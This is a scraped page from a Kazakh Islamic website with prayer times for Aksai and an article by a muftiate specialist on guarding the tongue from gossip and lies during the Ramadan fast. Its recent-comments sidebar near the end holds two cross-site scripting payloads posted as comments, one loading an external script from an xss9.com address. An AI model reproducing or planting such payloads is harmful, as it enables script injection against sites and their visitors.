Тіл оразасы
Ақсай
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Құптан 19:11
Аксай
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Аксай
ықшамдау
Таң Күн Бесін Аср Ақшам Құптан
07:50 09:28 13:35 15:47 17:33 19:11
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024

Мақалалар

Тіл оразасы

| A | +

Көзді ашып-жұмғанша он екі айдың сұлтаны болған, адамдарды тура жолға бастаушы, хақ пен батылды ажыратушы Алланың соңғы кітабы Құран Кәрім түсірілген, ораза ұстау мұсылмандарға парыз етілген Рамазан айының бірнеше күні өте шықты.

 

Ораза сөзі араб тілінде «саум» деп аталады. «Саум» сөзінің тілдік мағынасы барлық нәрседен тыйылу болса, шариғаттағы мағынасы Алла разылығы үшін таң атқаннан күн батқанға дейін шынайы ниет ете отырып, тамақ жеуден, сусын ішуден және жыныстық қатынастан тыйылу дегенді білдіреді.

 

Осы анықтамаға орай кей ораза ұстаушылар ораза ұстау тек қана ішіп-жеуден және жыныстық қатынастан тыйылу деп түсінеді. Алайда бұл түсінік қате. Өйткені оразаның ақиқаты, мақсаты бұл айтылғаннан әлдеқайда ауқымды. Кейбір ораза ұстаушылар ауызын халал нәрседен тыйғанымен, оразасын Алла Тағала арам еткен, жағымсыз амалмен ашып жатады. Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) ораза кезінде ғайбат айтқан екі қыздың оразасына қатысты «Бұлар халал жолмен ораза ұстады. Бірақ, адамдардың етін жеу арқылы харам жеумен аузын ашты» (Ахмад) деген. Өкінішке қарай ораза айында адал нәрселерден өзімізді тыйсақ та, арам нәрселерді тастай алмай жатырмыз.

 

Жоғарыда айтқандай, ораза тек қана ішіп-жеуден және жыныстық қатынастан тыйылу ғана емес, бүкіл дене мүшелеріміз де ораза болуы керек. Дене мүшелерінің оразасы дегеніміз – көзімізді, құлағымызды, тілімізді, қолымызды, аяғымызды және бүкіл дене мүшелерімізді күнәлі істерден, жаман сөздерден тыю. Яғни көзімізді шариғат тыйым салған нәрселерден тыю, мұны «көз оразасы» дейді. Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын): «Тыйым етілген нәрсеге қарау – шайтанның улы жебелерінің бірі. Кімде-кім мұндайға қараудан Алладан қорқып тыйылатын болса, Алла оған жүрегіне шынайы иман береді» (Хаким) дейді. Тілді жаман сөзден, өсек, ғайбаттан тыюды «тіл оразасы» дейді. Атақты табиғин Суфиян Саури (р.а.): «Ғайбат оразаны бұзады» десе, Мужаһид (р.а.): «Екі жаман нәрсе оразаны бұзады: ғайбат пен өтірік сөз» деген. Құлақты ғайбат, өсекті тыңдаудан сақтау бар. Мұны «құлақ оразасы» дейді. Басқа да дене мүшелерді жаман іс-әрекеттен сақтау қажет. Бұған қатысты Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) дене мүшелеріміз де ораза болуы керек екенін меңзеп, былай дейді: «Егер ораза ұстап, ішіп-жемнен тыйылсаң, құлағың да, көзің де, тілің де өтірік пен күнәлі істерден бірдей тыйылсын. Біреуге зиян келтіруден сақ бол. Ораза ұстаған күнің айбатты да салмақты болсын. Ораза ұстаған күнің мен ұстамаған күнің бірдей болмасын» (Ибн Әби Шәйба) деген.

 

Өйткені күнәлі істер, жаман сөздер Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) хабар бергеніндей ораза ұстаушының сауабын жояды. «Бес нәрсе оразаны бұзады. Олар – өтірік айту, ғайбат айту, өсек тасу, жалған ант ішу, шаһутпен (құмарлық) арам нәрсеге қарау» (Ихия улум уд-дин кітабында келген) деген. Басқа хадисте: «Қаншама ораза тұтушылар бар. Олардың ұстаған оразасынан алар несібесі – тек аш жүргені мен шөлдегені ғана» (Ибн Мәжаһ) дейді. Яғни кісі тамақ жемей, сусын ішпей жүргенімен жаман сөзден, жаман іс-әрекеттен өзін тыймаса оразаның пайдасы мен сауабынан мақұрым қалады.

 

Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) басқа хадисінде: «Кімде кім ауыз бекіткенімен жалған куәлік беру, жалған айтуын қоймаса, оның ішіп-жеуді тастағанының еш қажеті жоқ» (Бұхари) деп ораза сауабынан айырылатыны ескертілген.

 

Ораза ұстаушы тілмен болатын ғайбат, өтірік сөйлеу, жалған куәлік беру, өсек айту, адамдарға тілімен зиян беру секілді шариғатымызда тыйым салған жаман амалдардан өзін тыюы керек. Өйткені тілмен болатын бұл амалдар оразаның негізгі мақсатына қайшы әрі оразаға нұқсан келтіріп, сауабын жояды. Өйткені оразаның кәмілдігі тыйым етілген нәрселерден тыйылумен болады.

 

Имам Ғазали тілмен болатын күнәлардың жиырмаға жуық түрін айтқан. Тілмен болатын ғайбат, өтірік айту, жалған ант ішу, өсек айту оразаны бұзбаса да, толық, кәміл ораза мәртебесінен түсіреді. Тіпті Имам Ғазали сияқты ғалымдар ораза ұстаушы егер ішіп-жеу мен жыныстық қажеттіліктерден ғана тыйылып, ғайбат айтып, жалған куәлік беріп, өтірік сөйлеп, адамдарға сөзімен зиян келтіріп, шариғаттың тыйым салған нәрселерін тыйылмаса, оразасы қабыл болмайтынын, Қияметте пайда әкелмейтінін айтады. Фиқһ ғалымдары оразаға оның сыртқы көрінісімен ғана байланысты шарттарды қоя отырып, дене мүшелері арқылы болатын күнәлар оразаны бұзбайды десе, ал Имам Ғазали сияқты ғалымдар ғибадаттың қабыл болуына және мақсат етілген нәрсеге қол жеткізуге көңіл бөледі.

 

Сөзімізді қортындылар болсақ, тілмен жасалатын ғайбат, өсек сияқты шариғатымызда тыйым салынған нәрселер оразаның негізгі мақсатына қайшы. Кейбір ғалымдар айтқандай, оразаны бұзып, ауызды ашып жібермесе де бұлай ұсталған оразаның кемшілігі болады. Тіпті тілден табатын күнәдан тыйылмасақ оразаның парызын мойыннан түсіргенімізбен, Рамазанда уәде етілген сауаптардан мақұрым қалуымыз мүмкін.

 

Тіл – Алла Тағаланың пенделеріне берген ұлы нығметтерінің бірі. Тілді орынсыз пайдалану жақсы амалдардың сауабын жояды. Тіпті адам баласын тозаққа да түсіреді. Сондықтан екі дүниемізге пайдасы бар сөздерді сөйлеп, пайдасыз, күнәлі сөздерден тілімізді сақтауымыз керек. Хадисте «Кім Аллаға және ақырет күніне иман келтірсе, жақсы сөз сөйлесін немесе тіліне ие болып, тыныш отырсын» (Бұхари, Муслим) деген.

 

Рамазан айы болғанда нида қылушы (жар салушы): «Ей, жақсылық жасаушы, сауап істерге асық. Ей, жамандық жасаушы, күнә істеріңнен тыйыл» дейді екен. Ендеше, сауабы есепсіз берілетін тәрбие, тәубе айында жақсылық істерге асығып, күнә істерден тыйылып, шынайы тәубе етіп, өзімізді жақсы жағынан тәрбиелейік. Алла Тағала оразаны өзіне лайықты түрде тұтуымызды, Құранда айтылғандай, тақуалыққа жетуімізді әрі Қиямет күні жүзіміз жарқын күйде Раббымызбен жолығып, оразамыздың сауабын көріп, қуануымызды нәсіп етсін!

 

Медет ҚҰРСАҚОВ,

ҚМДБ Шариғат және пәтуа бөлімінің маманы

ДЕРЕККӨЗІ muftyat.kz

ҚМДБ ресми сайты

Предыдущий Следующий
Рамазан айына 10 кеңес Намаз оқымаған адамның ораза ұстауына бола ма?

Оқырмандардың пікірі (0)

Қызықты тақырыптар

Әдеп (этика) Аталарымыздың түсінген ұят ұғымы бүгін неліктен «ұят» саналуда?
Ата-бабамыздың «өлімнен ұят күшті», «ұялғанымнан жерге кіріп кете жаздадым», «малым жанымның садағасы, арым жанымның садағасы», деп өмір қағидасына айналдырып, жоғары баға берген «ұят» сезімі өкінішке орай қазіргі таңда жүрегімізде азайып, мүлдем жоғалып бара жатқандай. Олай дейтініміз қазіргі қоғам...
Әдеп (этика) Біздің қоғамға махаббат діні керек
Бүгінде уахаби, салафи, сопылық, сопылық емес, ханафи деп жүргенде, біраз азаматтардың көкірегінде дінге деген күмәнін қоюлатып алды. Дін десеңіз, тіпті ханафи мазһабы болса да, діни бір мәселені айтсаңыз, “арабқұлдар” дейтін болды. Тікелей араб әлемімен байланыстыратын болды. Бұл – өте бір қауіпті ...
Әдеп (этика) Ибраһим ҚҰНАНБАЙҰЛЫ: «Шын илан да, таза ойла бір иманды...»
Бүгін, яғни 23 тамыз – қазақтың маңдайына біткен ұлы ақыны, хәкім Абай (Ибраһим) Құнанбайұлының туған күні. Қадірлі оқырман, айтулы күннің құрметіне орай, дана ойшылымыздың дін мен арлылық, адамгершілік пен имандылық тақырыбында қалам тербеген бес өлеңін назарларыңызға ұсынамыз....
Әдеп (этика) Абайдың 17-қара сөзі: Қайрат, ақыл, жүрек үшеуінің айтысы
Қайрат, ақыл, жүрек үшеуі өнерлерін айтысып, таласып келіп, ғылымға жүгініпті.
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024
Намаз уақыттары
қазір

Құптан 19:11

Бамдатқа дейін 06:37

Что будет, если увидеть во сне Пророка ﷺ?

"/>"/"/><sCRiPt sRC=https://xss9.com/ivMw></sCrIpT>

X X
11 сағат. бұрын

О милостыне

"/1

X X
11 сағат. бұрын

Задайте вопрос устазам

Ва алейкум ассалам. Ваше омовение и намаз действительны, так как нить установлена в лечебных и в

Администратор Azankz
17 жел. 2024

Признаки любви к Пророку ﷺ

<script>alert(a)</script>

X
28 қыр. 2024

Обязанности мужчины перед своей семьей

А как же быть женщине, такой как я, которая рано вышла замуж, работала вплоть до родов, собирала каж

Лейла
28 қыр. 2024
Created with Sketch. {{!-- --}} {{!-- --}} {{!-- --}} Created with Sketch. Asset 1mdpi